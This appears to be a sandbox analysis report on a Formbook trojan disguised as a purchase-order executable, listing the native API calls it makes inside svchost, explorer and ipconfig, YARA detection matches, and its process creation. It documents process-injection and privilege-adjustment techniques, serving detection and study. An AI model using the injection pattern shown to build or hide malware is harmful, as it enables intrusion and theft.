          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C60 NtCreateKey,2_2_03872C60
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873090 NtSetValueKey,2_2_03873090
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038735C0 NtCreateMutant,2_2_038735C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D70 NtOpenThread,2_2_03873D70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_03DBA036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DBA042 NtQueryInformationProcess,2_2_03DBA042
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0568A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_0568A036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0568A042 NtQueryInformationProcess,2_2_0568A042
          Source: C:\Windows\explorer.exe | Code function: 3_2_10387232 NtCreateFile,3_2_10387232
          Source: C:\Windows\explorer.exe | Code function: 3_2_10388E12 NtProtectVirtualMemory,3_2_10388E12
          Source: C:\Windows\explorer.exe | Code function: 3_2_10388E0A NtProtectVirtualMemory,3_2_10388E0A
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_03932B60 NtClose,LdrInitializeThunk,5_2_03932B60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AD0 NtReadFile,LdrInitializeThunk,5_2_03932AD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FE0 NtCreateFile,LdrInitializeThunk,5_2_03932FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F30 NtCreateSection,LdrInitializeThunk,5_2_03932F30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03932EA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DD0 NtDelayExecution,LdrInitializeThunk,5_2_03932DD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03932DF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03932D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03932CA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03932C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C60 NtCreateKey,LdrInitializeThunk,5_2_03932C60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039335C0 NtCreateMutant,LdrInitializeThunk,5_2_039335C0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03934340 NtSetContextThread,5_2_03934340
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03934650 NtSuspendThread,5_2_03934650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932B80 NtQueryInformationFile,5_2_03932B80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BA0 NtEnumerateValueKey,5_2_03932BA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BF0 NtAllocateVirtualMemory,5_2_03932BF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932BE0 NtQueryValueKey,5_2_03932BE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AB0 NtWaitForSingleObject,5_2_03932AB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932AF0 NtWriteFile,5_2_03932AF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F90 NtProtectVirtualMemory,5_2_03932F90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FB0 NtResumeThread,5_2_03932FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932FA0 NtQuerySection,5_2_03932FA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932F60 NtCreateProcessEx,5_2_03932F60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932E80 NtReadVirtualMemory,5_2_03932E80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932EE0 NtQueueApcThread,5_2_03932EE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932E30 NtWriteVirtualMemory,5_2_03932E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932DB0 NtEnumerateKey,5_2_03932DB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D00 NtSetInformationFile,5_2_03932D00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932D30 NtUnmapViewOfSection,5_2_03932D30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CC0 NtQueryVirtualMemory,5_2_03932CC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932CF0 NtOpenProcess,5_2_03932CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03932C00 NtQueryInformationProcess,5_2_03932C00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933090 NtSetValueKey,5_2_03933090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933010 NtOpenDirectoryObject,5_2_03933010
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_039339B0 NtGetContextThread,5_2_039339B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933D10 NtOpenProcessToken,5_2_03933D10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_03933D70 NtOpenThread,5_2_03933D70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA3D0 NtReadFile,5_2_02FCA3D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA320 NtCreateFile,5_2_02FCA320
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA450 NtClose,5_2_02FCA450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA31D NtCreateFile,5_2_02FCA31D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02FCA44A NtClose,5_2_02FCA44A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_037A9BAF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_037AA036
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_037A9BB2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_037AA042 NtQueryInformationProcess,5_2_037AA042
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03887E54 appears 102 times
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 038AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 0382B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 038BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: String function: 03875130 appears 58 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 0397F290 appears 105 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 038EB970 appears 280 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 03947E54 appears 111 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 0396EA12 appears 86 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 03935130 appears 58 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: String function: 00445AE0 appears 55 times
          Source: Purchase order MIPO2425110032.exe, 00000000.00000003.2046861450.0000000004663000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase order MIPO2425110032.exe
          Source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045016582.000000000480D000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase order MIPO2425110032.exe
          Source: Purchase order MIPO2425110032.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Purchase order MIPO2425110032.exe PID: 2520, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 1396, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 6000, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine; Classification label: mal100.troj.evad.winEXE@1033/1@5/1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; File created: C:\Users\user\AppData\Local\Temp\harrowment
          Source: Purchase order MIPO2425110032.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Purchase order MIPO2425110032.exe; ReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; File read: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
          Source: unknown; Process created: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"
